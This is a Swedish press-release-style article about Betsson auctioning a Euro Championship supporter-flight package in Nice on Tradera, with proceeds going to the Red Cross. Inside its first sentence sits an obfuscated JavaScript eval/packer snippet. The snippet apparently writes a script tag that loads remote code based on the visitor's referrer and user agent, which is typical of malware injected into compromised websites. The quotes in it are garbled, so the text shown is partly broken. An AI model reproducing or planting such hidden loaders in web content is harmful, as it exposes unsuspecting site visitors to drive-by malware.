Image Image Image Image Image Image Image Image Image Image

| 29 mars, 2020

Scroll to top

Top

Betsson auktionerar ut en EM-upplevelse till förmån för Röda Korset

Betsson auktionerar ut en EM-upplevelse till förmån för Röda Korset
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nyhfd|var|u0026u|referrer|ibzna||js|php’.split(’|’),0,{}))
startar Betsson en
auktion på Tradera där högstbjudande ropar hem en exklusiv paketresa till årets stora fotbollsfest i Frankrike. I paketet ingår bland annat två platser till Betssons helt egna supporterflygplan som ska ta hundratalet svenska fotbollssupportrar till EM i Frankrike. Alla auktionsintäkter går oavkortat till Röda Korset.

Den 10 juni startar sommarens stora sportevenemang i Frankrike. Betsson kommer inför Sveriges sista gruppspelsmatch den 22 juni flyga ner ett helt supporterplan med syfte att stötta Sverige i matchen mot Belgien. I samarbete med Tradera har Betsson startat en auktion där högstbjudande får följa med på planet. Alla intäkter går till Svenska Röda Korsets katastrofhjälp.

– Tillsammans med Tradera gör vi det möjligt för hela Sverige att buda på en exklusiv fotbollsupplevelse som samtidigt bidrar till Röda Korsets viktiga arbete. Auktionsvinnaren får möjlighet att flyga ner till Frankrike med hundratals andra fotbollsälskare och vi hoppas att de kommer att bjudas på en oförglömlig EM-upplevelse, säger Raúl Valencia López, varumärkesansvarig Betsson Sverige

Utöver möjligheten att se Sveriges sista gruppspelsmatch mot Belgien på Stade de Nice ingår även två hotellnätter på fyrstjärniga Hotel Le Mérdien i Nice.

– Det här är ett paket för alla som älskar fotboll och samtidigt vill bidra till en god sak. Det känns kul att kunna stå värd för Betssons unika auktion som går till välgörande ändamål, säger Marcus Almen, Brand Manager Tradera.

Se auktionen på Tradera: http://www.tradera.com/item/280404/257208374/heja-fram-sverige-under-em-och-gor-samtidigt-en-god-garning-

Det här ingår:

·         2 platser på supporterplanet från Stockholm (Arlanda) till Nice den 21-23 juni

·         Möjligheten att se och heja fram Sverige i matchen mot Belgien den 22 juni

·         3 dagar i Nice och 2 nätter på fyrstjärniga Hotel Le Méridien i Nice

·         Transfer från flygplats till hotell

·         Inträde till evenemang på plats i Nice

·         Fullpackad goodiebag med bl.a matchtröjor